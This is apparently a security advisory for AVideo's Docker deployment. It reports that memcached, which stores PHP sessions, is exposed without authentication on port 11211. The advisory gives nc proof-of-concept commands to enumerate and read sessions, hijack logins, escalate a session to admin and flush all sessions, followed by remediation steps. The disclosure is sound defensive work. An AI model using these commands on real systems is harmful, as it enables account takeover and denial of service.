The official docker-compose.yml publishes the memcached service on host port 11211 (0.0.0.0:11211) with no authentication, while the Dockerfile configures PHP to store all user sessions in that memcached instance. An attacker who can reach port 11211 can read, modify, or flush session data — enabling session hijacking, admin impersonation, and mass session destruction without any application-level authentication.
High (CVSS 3.1: 8.1)
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
docker-compose.yml binds memcached to 0.0.0.0:11211 on the hostflush_all destroys all active sessions, forcing mass logoutdocker-compose.yml — memcached service ports directive (line 203)Dockerfile — PHP session configuration (lines 150-151)The docker-compose.yml publishes the memcached port to the Docker host's network interface:
# docker-compose.yml — lines 192-213
memcached:
image: memcached:alpine
restart: unless-stopped
command: >
memcached -m 512 -c 2048 -t ${NPROC:-4} -R 200
ports:
- "${MEMCACHE_PORT:-11211}:11211" # <-- Exposes to 0.0.0.0:11211
networks:
- app_net
The memcached command has no authentication flags:
-S flag (SASL authentication)-l 127.0.0.1 flag (interface binding restriction)The default env.example reinforces this port:
MEMCACHE_PORT=11211
The Dockerfile configures PHP to use memcached as the session store:
; Dockerfile — lines 150-151
session.save_handler = memcached
session.save_path = "memcached:11211?persistent=1&timeout=2&retry_interval=5"
The application stores complete authentication state in sessions. From objects/user.php:
// user.php:1521 — login check
$isLogged = !empty($_SESSION['user']['id']);
// user.php:1544 — admin check
return !empty($_SESSION['user']['isAdmin']);
Session data includes: user ID, email, username, password hash, admin flag, channel name, photo URL, and email verification status (user.php lines 329-733). All of this is readable and writable via the exposed memcached port.
The docker-compose.yml demonstrates awareness of proper service isolation — both database services have NO ports: directive:
# docker-compose.yml — database service (lines 136-163)
database:
build:
context: .
dockerfile: Dockerfile.mariadb
# ... NO ports: directive — internal only
networks:
- app_net
# docker-compose.yml — database_encoder service (lines 165-189)
database_encoder:
build:
context: .
dockerfile: Dockerfile.mariadb
# ... NO ports: directive — internal only
networks:
- app_net
Both databases are only reachable via the internal app_net Docker network. Memcached — which stores equally sensitive session data — should follow the same pattern but does not. This inconsistency confirms the exposure is an oversight, not a design choice.
| Service | Ports published to host | Contains sensitive data | Exposure justified |
|---|---|---|---|
| avideo | 80, 443, 2053 | N/A (web server) | Yes — serves web traffic |
| live | 1935, 8080, 8443 | N/A (streaming) | Yes — serves RTMP/HLS |
| database | None | Yes (all app data) | Correct — internal only |
| database_encoder | None | Yes (encoder data) | Correct — internal only |
| memcached | 11211 | Yes (all sessions) | No — should be internal only |
nc TARGET 11211 or any memcached client — no authentication requiredstats items to enumerate session slab classesstats cachedump <slab_id> <limit> to list session keysget <session_key> to read serialized PHP session data containing user IDs, admin flags, and password hashesisAdmin to true via set <session_key>flush_all to destroy all sessions# 1. Verify memcached is reachable (returns server stats)
echo -e "stats\r" | nc TARGET 11211
# 2. Enumerate session keys
echo -e "stats items\r" | nc TARGET 11211
# Then for each slab:
echo -e "stats cachedump 1 100\r" | nc TARGET 11211
# 3. Read a session (key format: memc.sess.key.<session_id>)
echo -e "get memc.sess.key.abc123sessionid\r" | nc TARGET 11211
# Returns serialized PHP session with user data, admin flag, etc.
# 4. DoS — destroy all sessions (logs out every user)
echo -e "flush_all\r" | nc TARGET 11211
For session hijacking, extract the session ID from step 3 and set it as the PHPSESSID cookie in a browser to impersonate the victim user.
$_SESSION['user']['isAdmin'] to a truthy value, granting admin access to any session$_SESSION['user']['passhash'], user.php:555) that can be cracked offlineflush_all destroys all active sessions, forcing every logged-in user to re-authenticate — a one-command denial of servicestats reveals server uptime, memory usage, connection counts, and cache hit/miss ratiosMemcached is only used internally by the PHP application via Docker networking. Remove the ports: directive entirely:
# docker-compose.yml — memcached service
memcached:
image: memcached:alpine
restart: unless-stopped
command: >
memcached -m 512 -c 2048 -t ${NPROC:-4} -R 200
# REMOVED: ports:
# - "${MEMCACHE_PORT:-11211}:11211"
deploy:
resources:
limits:
cpus: '1'
memory: "4G"
reservations:
cpus: '0.5'
memory: '1G'
networks:
- app_net
Also remove MEMCACHE_PORT=11211 from env.example since the port is no longer published.
The PHP application connects via the Docker internal hostname memcached:11211 (from session.save_path), which uses the app_net bridge network and does not require host-level port mapping.
If host-level access to memcached is needed for debugging, bind only to the loopback interface:
ports:
- "127.0.0.1:${MEMCACHE_PORT:-11211}:11211"
This prevents remote access while allowing localhost:11211 connections from the Docker host.
Add SASL authentication to memcached as an additional layer:
command: >
memcached -m 512 -c 2048 -t ${NPROC:-4} -R 200 -S
environment:
MEMCACHED_USERNAME: "${MEMCACHED_USER:-avideo}"
MEMCACHED_PASSWORD: "${MEMCACHED_PASSWORD}"
Update the PHP session configuration accordingly:
session.save_path = "PERSISTENT=myapp avideo:${MEMCACHED_PASSWORD}@memcached:11211"
Note: Option 1 alone is sufficient and should be applied immediately. Options 2 and 3 provide defense-in-depth.
This vulnerability was discovered and reported by bugbunny.ai.
{
"cwe_ids": [
"CWE-287",
"CWE-668"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-05T01:22:21Z",
"nvd_published_at": "2026-03-06T04:16:08Z",
"severity": "HIGH"
}